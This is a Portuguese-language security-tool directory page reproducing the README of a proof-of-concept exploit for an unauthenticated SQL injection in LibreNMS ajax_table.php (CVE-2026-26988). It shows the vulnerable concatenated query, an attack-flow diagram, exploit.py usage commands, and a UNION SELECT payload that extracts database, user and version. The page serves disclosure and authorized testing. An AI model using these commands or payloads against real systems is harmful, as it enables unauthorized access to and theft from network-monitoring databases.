Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-26988-LibreNMS-SQLi — Prova de conceito de exploit para injeção SQL não autenticada no LibreNMS ajax_table.php, demonstrando técnicas de injeção cega baseada em tempo e baseada em booleano para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/mbanyamer/cve-2026-26988-librenms-sqli
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubmbanyamer/cve-2026-26988-librenms-sqli

CVE-2026-26988-LibreNMS-SQLi

Prova de conceito de exploit para injeção SQL não autenticada no LibreNMS ajax_table.php, demonstrando técnicas de injeção cega baseada em tempo e baseada em booleano para testes de segurança autorizados.

Ver Repositório
15há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Author Role Country Platform Vulnerability CVE CVSS Status

CVE-2026-26988 – PoC de Injeção SQL Não Autenticada no LibreNMS

Injeção SQL Não Autenticada no ajax_table.php do LibreNMS através do parâmetro de pesquisa de endereço IPv6.

  • Versões afetadas: LibreNMS ≤ 25.12.0
  • Corrigido em: LibreNMS ≥ 26.1 (commit 15429580baba03ed1dd377bada1bde4b7a1175a1)
  • CVSS v4.0: 9.3 Crítico
    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N
  • CWE: CWE-89 (Neutralização Incorreta de Elementos Especiais usados em um Comando SQL – Injeção SQL)

Resumo da Vulnerabilidade

O parâmetro address quando search_type=ipv6 é dividido por / em endereço e prefixo.
O prefixo é diretamente concatenado em uma consulta SQL sem escape:

$sql .= " AND ipv6_prefixlen = '$prefix'";

Uma aspa simples (') na parte do prefixo permite sair do literal de string → injeção SQL arbitrária.

Diagrama do Fluxo de Ataque

flowchart TD
    A[Atacante] -->|1. HTTP POST para /ajax_table.php| B[Servidor Web LibreNMS]
    B -->|2. id=address-search & search_type=ipv6| C[Analisar parâmetro address]
    C -->|3. Dividir por '/' → $address / $prefix| D[Construir SQL vulnerável]
    D -->|4. Concatenar: ipv6_prefixlen = '$prefix'| E[MySQL / MariaDB]
    E -->|5. Executar consulta injetada| F[Retornar resultados / erro / atraso]
    F -->|6. Atacante observa resposta / tempo| A

    subgraph "Ponto de Injeção"
        D
    end

    style D fill:#ff4d4d,stroke:#333,stroke-width:2px,color:#fff

Uso do Proof-of-Concept

Requisitos

  • Python 3.x
  • Biblioteca requests (pip install requests)

Teste Básico (Erro de Sintaxe / 500)

python3 exploit.py http://target/librenms --test

Confirmação Cega Baseada em Tempo (Recomendado)

python3 exploit.py http://192.168.1.50/librenms --time

→ Se a resposta levar >5–6 segundos → vulnerável

Teste Cego Baseado em Booleano

python3 exploit.py http://target/librenms --boolean

Exemplo de Payload Personalizado

python3 exploit.py http://target/librenms --test --payload "64' UNION SELECT database(),user(),version() -- "

Arquivos neste Repositório

  • exploit.py .............. Script PoC principal (renomeie de cve-2026-26988-poc.py se necessário)
  • README.md ............... Este arquivo

Divulgação Responsável

  • Reportado: Fevereiro de 2026 (via GitHub Security Advisory)
  • Corrigido em: commit 15429580baba... → PR #18777
  • Aviso: https://github.com/librenms/librenms/security/advisories/GHSA-h3rv-q4rq-pqcv

Aviso Legal e Ético

Este proof-of-concept é fornecido apenas para fins educacionais e de testes de segurança autorizados.

NÃO use este código contra qualquer sistema ou rede sem permissão escrita explícita do proprietário.
O uso não autorizado pode violar leis, incluindo (mas não se limitando a) o Computer Fraud and Abuse Act (CFAA) nos EUA, ou legislação equivalente no seu país.

Use por sua conta e risco.


Autor: Mohammed Idrees Banyamer
Instagram: @banyamer_security
Data: 20 de fevereiro de 2026

Baixar ferramenta